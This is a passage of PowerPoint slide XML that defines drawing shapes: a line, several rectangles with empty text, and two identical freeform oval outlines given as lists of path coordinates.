              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2042" y="2625"/>
                <a:ext cx="1" cy="41"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="14288">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10656" name="Rectangle 63"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1716" y="2625"/>
                <a:ext cx="322" cy="40"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CCCCFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10657" name="Rectangle 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1913" y="2642"/>
                <a:ext cx="0" cy="123"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="1800">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10658" name="Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1713" y="2577"/>
                <a:ext cx="325" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 147 w 325"/>
                  <a:gd name="T1" fmla="*/ 0 h 77"/>
                  <a:gd name="T2" fmla="*/ 114 w 325"/>
                  <a:gd name="T3" fmla="*/ 1 h 77"/>
                  <a:gd name="T4" fmla="*/ 85 w 325"/>
                  <a:gd name="T5" fmla="*/ 5 h 77"/>
                  <a:gd name="T6" fmla="*/ 59 w 325"/>
                  <a:gd name="T7" fmla="*/ 10 h 77"/>
                  <a:gd name="T8" fmla="*/ 37 w 325"/>
                  <a:gd name="T9" fmla="*/ 14 h 77"/>
                  <a:gd name="T10" fmla="*/ 28 w 325"/>
                  <a:gd name="T11" fmla="*/ 18 h 77"/>
                  <a:gd name="T12" fmla="*/ 20 w 325"/>
                  <a:gd name="T13" fmla="*/ 20 h 77"/>
                  <a:gd name="T14" fmla="*/ 13 w 325"/>
                  <a:gd name="T15" fmla="*/ 24 h 77"/>
                  <a:gd name="T16" fmla="*/ 8 w 325"/>
                  <a:gd name="T17" fmla="*/ 27 h 77"/>
                  <a:gd name="T18" fmla="*/ 3 w 325"/>
                  <a:gd name="T19" fmla="*/ 31 h 77"/>
                  <a:gd name="T20" fmla="*/ 1 w 325"/>
                  <a:gd name="T21" fmla="*/ 35 h 77"/>
                  <a:gd name="T22" fmla="*/ 0 w 325"/>
                  <a:gd name="T23" fmla="*/ 39 h 77"/>
                  <a:gd name="T24" fmla="*/ 1 w 325"/>
                  <a:gd name="T25" fmla="*/ 42 h 77"/>
                  <a:gd name="T26" fmla="*/ 3 w 325"/>
                  <a:gd name="T27" fmla="*/ 47 h 77"/>
                  <a:gd name="T28" fmla="*/ 8 w 325"/>
                  <a:gd name="T29" fmla="*/ 50 h 77"/>
                  <a:gd name="T30" fmla="*/ 13 w 325"/>
                  <a:gd name="T31" fmla="*/ 54 h 77"/>
                  <a:gd name="T32" fmla="*/ 20 w 325"/>
                  <a:gd name="T33" fmla="*/ 57 h 77"/>
                  <a:gd name="T34" fmla="*/ 28 w 325"/>
                  <a:gd name="T35" fmla="*/ 61 h 77"/>
                  <a:gd name="T36" fmla="*/ 37 w 325"/>
                  <a:gd name="T37" fmla="*/ 63 h 77"/>
                  <a:gd name="T38" fmla="*/ 59 w 325"/>
                  <a:gd name="T39" fmla="*/ 69 h 77"/>
                  <a:gd name="T40" fmla="*/ 85 w 325"/>
                  <a:gd name="T41" fmla="*/ 73 h 77"/>
                  <a:gd name="T42" fmla="*/ 114 w 325"/>
                  <a:gd name="T43" fmla="*/ 76 h 77"/>
                  <a:gd name="T44" fmla="*/ 146 w 325"/>
                  <a:gd name="T45" fmla="*/ 77 h 77"/>
                  <a:gd name="T46" fmla="*/ 179 w 325"/>
                  <a:gd name="T47" fmla="*/ 77 h 77"/>
                  <a:gd name="T48" fmla="*/ 211 w 325"/>
                  <a:gd name="T49" fmla="*/ 76 h 77"/>
                  <a:gd name="T50" fmla="*/ 240 w 325"/>
                  <a:gd name="T51" fmla="*/ 73 h 77"/>
                  <a:gd name="T52" fmla="*/ 267 w 325"/>
                  <a:gd name="T53" fmla="*/ 69 h 77"/>
                  <a:gd name="T54" fmla="*/ 289 w 325"/>
                  <a:gd name="T55" fmla="*/ 63 h 77"/>
                  <a:gd name="T56" fmla="*/ 298 w 325"/>
                  <a:gd name="T57" fmla="*/ 61 h 77"/>
                  <a:gd name="T58" fmla="*/ 307 w 325"/>
                  <a:gd name="T59" fmla="*/ 57 h 77"/>
                  <a:gd name="T60" fmla="*/ 312 w 325"/>
                  <a:gd name="T61" fmla="*/ 54 h 77"/>
                  <a:gd name="T62" fmla="*/ 318 w 325"/>
                  <a:gd name="T63" fmla="*/ 50 h 77"/>
                  <a:gd name="T64" fmla="*/ 323 w 325"/>
                  <a:gd name="T65" fmla="*/ 47 h 77"/>
                  <a:gd name="T66" fmla="*/ 325 w 325"/>
                  <a:gd name="T67" fmla="*/ 42 h 77"/>
                  <a:gd name="T68" fmla="*/ 325 w 325"/>
                  <a:gd name="T69" fmla="*/ 39 h 77"/>
                  <a:gd name="T70" fmla="*/ 325 w 325"/>
                  <a:gd name="T71" fmla="*/ 35 h 77"/>
                  <a:gd name="T72" fmla="*/ 323 w 325"/>
                  <a:gd name="T73" fmla="*/ 31 h 77"/>
                  <a:gd name="T74" fmla="*/ 318 w 325"/>
                  <a:gd name="T75" fmla="*/ 27 h 77"/>
                  <a:gd name="T76" fmla="*/ 312 w 325"/>
                  <a:gd name="T77" fmla="*/ 24 h 77"/>
                  <a:gd name="T78" fmla="*/ 307 w 325"/>
                  <a:gd name="T79" fmla="*/ 20 h 77"/>
                  <a:gd name="T80" fmla="*/ 298 w 325"/>
                  <a:gd name="T81" fmla="*/ 18 h 77"/>
                  <a:gd name="T82" fmla="*/ 289 w 325"/>
                  <a:gd name="T83" fmla="*/ 14 h 77"/>
                  <a:gd name="T84" fmla="*/ 267 w 325"/>
                  <a:gd name="T85" fmla="*/ 10 h 77"/>
                  <a:gd name="T86" fmla="*/ 240 w 325"/>
                  <a:gd name="T87" fmla="*/ 5 h 77"/>
                  <a:gd name="T88" fmla="*/ 211 w 325"/>
                  <a:gd name="T89" fmla="*/ 1 h 77"/>
                  <a:gd name="T90" fmla="*/ 179 w 325"/>
                  <a:gd name="T91" fmla="*/ 0 h 7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5"/>
                  <a:gd name="T139" fmla="*/ 0 h 77"/>
                  <a:gd name="T140" fmla="*/ 325 w 325"/>
                  <a:gd name="T141" fmla="*/ 77 h 7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5" h="77">
                    <a:moveTo>
                      <a:pt x="163" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="147" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CCCCFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10659" name="Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1713" y="2577"/>
                <a:ext cx="325" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 147 w 325"/>
                  <a:gd name="T1" fmla="*/ 0 h 77"/>
                  <a:gd name="T2" fmla="*/ 114 w 325"/>
                  <a:gd name="T3" fmla="*/ 1 h 77"/>
                  <a:gd name="T4" fmla="*/ 85 w 325"/>
                  <a:gd name="T5" fmla="*/ 5 h 77"/>
                  <a:gd name="T6" fmla="*/ 59 w 325"/>
                  <a:gd name="T7" fmla="*/ 10 h 77"/>
                  <a:gd name="T8" fmla="*/ 37 w 325"/>
                  <a:gd name="T9" fmla="*/ 14 h 77"/>
                  <a:gd name="T10" fmla="*/ 28 w 325"/>
                  <a:gd name="T11" fmla="*/ 18 h 77"/>
                  <a:gd name="T12" fmla="*/ 20 w 325"/>
                  <a:gd name="T13" fmla="*/ 20 h 77"/>
                  <a:gd name="T14" fmla="*/ 13 w 325"/>
                  <a:gd name="T15" fmla="*/ 24 h 77"/>
                  <a:gd name="T16" fmla="*/ 8 w 325"/>
                  <a:gd name="T17" fmla="*/ 27 h 77"/>
                  <a:gd name="T18" fmla="*/ 3 w 325"/>
                  <a:gd name="T19" fmla="*/ 31 h 77"/>
                  <a:gd name="T20" fmla="*/ 1 w 325"/>
                  <a:gd name="T21" fmla="*/ 35 h 77"/>
                  <a:gd name="T22" fmla="*/ 0 w 325"/>
                  <a:gd name="T23" fmla="*/ 39 h 77"/>
                  <a:gd name="T24" fmla="*/ 1 w 325"/>
                  <a:gd name="T25" fmla="*/ 42 h 77"/>
                  <a:gd name="T26" fmla="*/ 3 w 325"/>
                  <a:gd name="T27" fmla="*/ 47 h 77"/>
                  <a:gd name="T28" fmla="*/ 8 w 325"/>
                  <a:gd name="T29" fmla="*/ 50 h 77"/>
                  <a:gd name="T30" fmla="*/ 13 w 325"/>
                  <a:gd name="T31" fmla="*/ 54 h 77"/>
                  <a:gd name="T32" fmla="*/ 20 w 325"/>
                  <a:gd name="T33" fmla="*/ 57 h 77"/>
                  <a:gd name="T34" fmla="*/ 28 w 325"/>
                  <a:gd name="T35" fmla="*/ 61 h 77"/>
                  <a:gd name="T36" fmla="*/ 37 w 325"/>
                  <a:gd name="T37" fmla="*/ 63 h 77"/>
                  <a:gd name="T38" fmla="*/ 59 w 325"/>
                  <a:gd name="T39" fmla="*/ 69 h 77"/>
                  <a:gd name="T40" fmla="*/ 85 w 325"/>
                  <a:gd name="T41" fmla="*/ 73 h 77"/>
                  <a:gd name="T42" fmla="*/ 114 w 325"/>
                  <a:gd name="T43" fmla="*/ 76 h 77"/>
                  <a:gd name="T44" fmla="*/ 146 w 325"/>
                  <a:gd name="T45" fmla="*/ 77 h 77"/>
                  <a:gd name="T46" fmla="*/ 179 w 325"/>
                  <a:gd name="T47" fmla="*/ 77 h 77"/>
                  <a:gd name="T48" fmla="*/ 211 w 325"/>
                  <a:gd name="T49" fmla="*/ 76 h 77"/>
                  <a:gd name="T50" fmla="*/ 240 w 325"/>
                  <a:gd name="T51" fmla="*/ 73 h 77"/>
                  <a:gd name="T52" fmla="*/ 267 w 325"/>
                  <a:gd name="T53" fmla="*/ 69 h 77"/>
                  <a:gd name="T54" fmla="*/ 289 w 325"/>
                  <a:gd name="T55" fmla="*/ 63 h 77"/>
                  <a:gd name="T56" fmla="*/ 298 w 325"/>
                  <a:gd name="T57" fmla="*/ 61 h 77"/>
                  <a:gd name="T58" fmla="*/ 307 w 325"/>
                  <a:gd name="T59" fmla="*/ 57 h 77"/>
                  <a:gd name="T60" fmla="*/ 312 w 325"/>
                  <a:gd name="T61" fmla="*/ 54 h 77"/>
                  <a:gd name="T62" fmla="*/ 318 w 325"/>
                  <a:gd name="T63" fmla="*/ 50 h 77"/>
                  <a:gd name="T64" fmla="*/ 323 w 325"/>
                  <a:gd name="T65" fmla="*/ 47 h 77"/>
                  <a:gd name="T66" fmla="*/ 325 w 325"/>
                  <a:gd name="T67" fmla="*/ 42 h 77"/>
                  <a:gd name="T68" fmla="*/ 325 w 325"/>
                  <a:gd name="T69" fmla="*/ 39 h 77"/>
                  <a:gd name="T70" fmla="*/ 325 w 325"/>
                  <a:gd name="T71" fmla="*/ 35 h 77"/>
                  <a:gd name="T72" fmla="*/ 323 w 325"/>
                  <a:gd name="T73" fmla="*/ 31 h 77"/>
                  <a:gd name="T74" fmla="*/ 318 w 325"/>
                  <a:gd name="T75" fmla="*/ 27 h 77"/>
                  <a:gd name="T76" fmla="*/ 312 w 325"/>
                  <a:gd name="T77" fmla="*/ 24 h 77"/>
                  <a:gd name="T78" fmla="*/ 307 w 325"/>
                  <a:gd name="T79" fmla="*/ 20 h 77"/>
                  <a:gd name="T80" fmla="*/ 298 w 325"/>
                  <a:gd name="T81" fmla="*/ 18 h 77"/>
                  <a:gd name="T82" fmla="*/ 289 w 325"/>
                  <a:gd name="T83" fmla="*/ 14 h 77"/>
                  <a:gd name="T84" fmla="*/ 267 w 325"/>
                  <a:gd name="T85" fmla="*/ 10 h 77"/>
                  <a:gd name="T86" fmla="*/ 240 w 325"/>
                  <a:gd name="T87" fmla="*/ 5 h 77"/>
                  <a:gd name="T88" fmla="*/ 211 w 325"/>
                  <a:gd name="T89" fmla="*/ 1 h 77"/>
                  <a:gd name="T90" fmla="*/ 179 w 325"/>
                  <a:gd name="T91" fmla="*/ 0 h 7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5"/>
                  <a:gd name="T139" fmla="*/ 0 h 77"/>
                  <a:gd name="T140" fmla="*/ 325 w 325"/>
                  <a:gd name="T141" fmla="*/ 77 h 7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5" h="77">
                    <a:moveTo>
                      <a:pt x="163" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="147" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="1"/>
